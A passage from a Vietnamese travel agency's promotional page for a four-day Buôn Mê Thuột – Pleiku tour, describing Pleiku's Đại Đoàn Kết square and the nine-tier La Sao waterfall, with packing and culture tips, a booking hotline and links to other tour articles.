Quảng trường Đại Đoàn Kết được mệnh danh là “trái tim của phố núi” – Pleiku

Quảng trường chính thức hoàn thành vào khoảng tháng 12/2012 với diện tích 12ha. Cùng với Bảo tàng Hồ Chí Minh, Bảo tàng Cổ vật cùng Tượng đài Anh hùng Núp – nơi đã hình thành nên công trình văn hoá – nghệ thuật độc đáo đậm bản sắc Tây Nguyên. 

Nằm trong khuôn viên quảng trường cũng có một số kiến trúc đồ sộ khác như bức tượng đài Chủ tịch Hồ Chí Minh cao trên 10m, tháp đá hoa cương 3 tầng hình cầu đại diện cho 54 dân tộc thiểu số Việt Nam, giàn chiêng – biểu trưng đặc sắc của vùng Tây Nguyên, . .. và nhiều công trình đặc sắc khác.

>>>Xem thêm: Vé máy bay Tết đi Buôn Ma Thuột

6. Thác Chín Tầng 

Chuyến tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm sẽ thêm phần trọn vẹn hơn nếu như bạn đến thăm thác 9 tầng La Sao. Đây là một địa điểm không những quen thuộc với người dân địa phương mà còn được rất nhiều những du khách từ xa “săn đón” bởi vẻ đẹp hùng vĩ mà thơ mộng của nó. 

Tour Buôn Mê Thuột - Pleiku 4 ngày 3 đêm - Thác Chín Tầng 

Thác 9 tầng sở hữu trên người nét đẹp mạnh mẽ, cùng dòng nước chảy tạo lên nét mờ ảo và mộng mơ

Cách Pleiku khoảng 30km, con thác được bao phủ bởi một khu rừng già hoang sơ và kỳ thú. Bắt nguồn bởi một con thác trên ngọn đồi cao, với dòng chảy cực mạnh mẽ vẽ lên một khung cảnh kỳ vĩ. Điểm nhấn là cánh rừng già nguyên sinh xanh mát với hệ thống thực vật phong phú và đặc sắc càng tô điểm thêm nét đẹp hoang sơ cho khu vực tham quan. 

Dòng thác 9 tầng không chảy trực tiếp xuống nước mà lại quanh co và luồn lách theo từng khe núi gập ghềnh để phân chia dòng thác làm 9 tầng – đó là lý do có tên thác. Mỗi tầng có chiều cao khoảng 5 – 10m, còn 2 tầng cuối cùng sẽ cao khoảng 15m, với các tầng thác hùng vĩ thế này cũng là sự thách thức khiến du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm mong muốn khám phá. 

Thác nước không chảy ào ào xuống mà dữ dội vô cùng hùng vĩ. Tuy nhiên âm thanh của thác là không hề nhỏ bé và luôn sở hữu trên người nét đẹp mạnh mẽ, cùng dòng nước chảy tạo lên nét mờ ảo và mộng mơ. Nhìn từ xa trông dòng thác như con phượng hoàng đang cong mình và như muốn vút bay trên bầu trời. Đến thác chắc chắn sẽ đưa du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm đến những cảm nhận cùng góc nhìn mới lạ đối với núi rừng Tây Nguyên. 

NHỮNG LƯU Ý KHI ĐI TOUR BUÔN MÊ THUỘT – PLEIKU 4 NGÀY 3 ĐÊM 

Khi đi tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm, bạn cần lưu ý những điểm sau để có chuyến du lịch suôn sẻ và an toàn:

 1. Chuẩn bị đồ dùng: Bạn cần chuẩn bị đồ dùng như: Áo khoác, giày dép thoải mái, nón, kem chống nắng, thuốc sát trùng, và các loại thuốc đặc trị khác,…
 2. Lịch trình tour: Bạn nên xem qua và nắm rõ lịch trình tour trước để biết được những địa điểm sẽ đi qua và thời gian di chuyển để kịp thời lên kế hoạch cho chuyến đi.
 3. Điểm du lịch: Buôn Mê Thuột có nhiều địa điểm du lịch nổi tiếng như: La Kha, Suối Ali, Khu du lịch Ede, Bản đồ đồng,.. còn Pleiku có chùa Minh Thành, Thác Phú Cường,…Du khách tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm có thể chuẩn bị lên kế hoạch trước để tham quan địa điểm thú vị này.
 4. Văn hóa địa phương: Buôn Mê Thuột và Pleiku có văn hóa dân tộc đặc trưng như Bana, Ede, M’Nông… bạn có thể tìm hiểu và đến thăm những ngôi làng của người bản địa để trải nghiệm văn hóa độc đáo của các dân tộc nơi đây.

Trên đây là lịch trình tour Buôn Mê Thuột – Pleiku 4 ngày 3 đêm chi tiết. Cùng với đó là các gợi ý về một số điểm check-in tuyệt đẹp tại Đắk Lắk và Gia Lai mà Đi Để Đến tổng hợp được cho bạn tham khảo.

Nếu có những thắc mắc hoặc muốn nhận được dịch vụ tư vấn tour du lịch miễn phí. Quý khách vui lòng liên hệ với chúng tôi qua hotline: 1900 3398 để được giải đáp ngay hôm nay. Chúc quý khách có một chuyến đi thành công ngoài mong đợi!

ĐĂNG KÍ TƯ VẤN TOUR BUÔN MÊ THUỘT - PLEIKU 4 NGÀY 3 ĐÊM

 • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
  Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
 • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
  Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
 • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
  Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
 • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
  Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
 • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
  Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
 • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
  Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]